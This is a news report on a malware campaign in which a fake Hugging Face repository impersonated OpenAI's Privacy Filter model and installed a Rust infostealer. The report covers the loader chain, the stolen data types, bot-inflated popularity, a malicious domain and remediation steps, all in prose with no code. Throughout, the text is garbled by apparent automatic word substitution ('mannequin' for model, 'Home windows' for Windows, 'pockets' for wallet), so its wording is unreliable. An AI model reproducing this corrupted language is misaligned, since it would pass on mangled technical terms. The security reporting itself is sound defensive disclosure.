Faux OpenAI Repo Hit #1 on Hugging Face—And Stole Passwords Whereas It Trended

OpenAI launched Privacy Filter in late April—a small, open-weight mannequin constructed to detect and mechanically redact personally identifiable info from textual content. It landed on Hugging Face underneath an Apache 2.0 license and shortly attracted developer curiosity. Somebody observed.

Inside days, a pretend account named “Open-OSS” printed a near-identical repository referred to as privacy-filter. The mannequin card was copied phrase for phrase from OpenAI’s. The one distinction within the “readme” file: directions to clone the repo and run a file referred to as begin.bat on Home windows, or loader.py on Linux and Mac.

Inside 18 hours, the pretend repo hit #1 on Hugging Face’s trending web page—racking up roughly 244,000 downloads and 667 likes. HiddenLayerthe AI safety agency that flagged the marketing campaign, discovered that 657 of these 667 likes got here from accounts matching predictable auto-generated bot-naming patterns.

The obtain numbers had been nearly actually inflated the identical approach. Manufactured social proof to make the bait look actual.

How the malware truly labored

The malware mainly labored like a poisoned capsule wrapped in a really convincing sweet coating. The loader.py script opens with pretend mannequin coaching output—progress bars, artificial datasets, dummy class names—designed to appear like an actual AI loader is operating.

Beneath the hood, it quietly disables safety checks, pulls an encoded command from a public JSON paste web site (a wise trick: no have to replace the repository when the payload adjustments), and passes that command to PowerShell operating utterly hidden within the background. Home windows customers see nothing.

That command downloads a second script from a website mimicking a blockchain analytics API. That script downloads the precise malware—a custom-built infostealer written in Rust—provides it to Home windows Defender’s exclusions listing, then launches it at SYSTEM-level privileges by way of a scheduled job that instantly deletes itself after firing. The entire chain runs and cleans up after itself, leaving nearly no hint.

The ultimate payload is thorough. It grabs all the things saved in Chrome and Firefox—saved passwords, session cookies, browser historical past, encryption keys, all the things. It targets Discord accounts, cryptocurrency pockets seed phrases, SSH keys, FTP credentials, and takes screenshots throughout all screens. Then it packages all the things as a compressed JSON bundle and ships it to attacker-controlled servers.

There’s no want for us to inform you what the hackers can do with all that info later.

The malware additionally checks whether or not it is operating in a digital machine or a safety sandbox, and quits quietly if it detects one. It is designed to run as soon as on actual targets, steal all the things, and disappear.

Why that is larger than only one repo

This is not an remoted incident. It is a part of a sample. HiddenLayer recognized six further repositories underneath a separate Hugging Face account named “anthfu,” uploaded in late April, utilizing the very same malicious loader pointing to the very same command server. These repos impersonated fashions like Qwen3, DeepSeek, and Bonsai to lure AI builders.

The infrastructure itself—a website referred to as api.eth-fastscan.org—was also observed internet hosting a separate malware pattern that beacons to a command server. HiddenLayer believes the connection between the 2 campaigns is “probably linked” and cautions that shared infrastructure alone does not verify a single operator.

That is what a supply chain attack in opposition to the AI developer group appears to be like like. The attacker does not break into OpenAI or Hugging Face. They simply publish a convincing lookalike, recreation the trending algorithm with bots, and anticipate builders to do the remaining. A similar playbook hit the Lottie Participant JavaScript library in 2024, costing one consumer 10 Bitcoin (price over $700,000 on the time).

What in case you downloaded it?

For those who cloned Open-OSS/privacy-filter on a Home windows machine and ran any file from it, it is best to deal with the gadget as totally compromised. Do not log into something from that machine earlier than wiping it.

After that, change all of the credentials that had been saved in your browser—passwords, session cookies, OAuth tokens. Transfer any crypto funds to a brand new pockets generated on a clear gadget ASAP and assume seed phrases had been stolen.

Because it additionally will get your Discord info, and that service is closely automated, it is best to invalidate your Discord classes and reset that password. Any SSH keys or FTP credentials on that machine needs to be thought of burned.

The repository is now eliminated. Huggingface has not disclosed what, if any, further screening measures it plans to implement for trending repositories.

As of now, seven confirmed malicious repositories from this marketing campaign have been recognized. What number of extra exist—or existed earlier than being detected—stays unknown.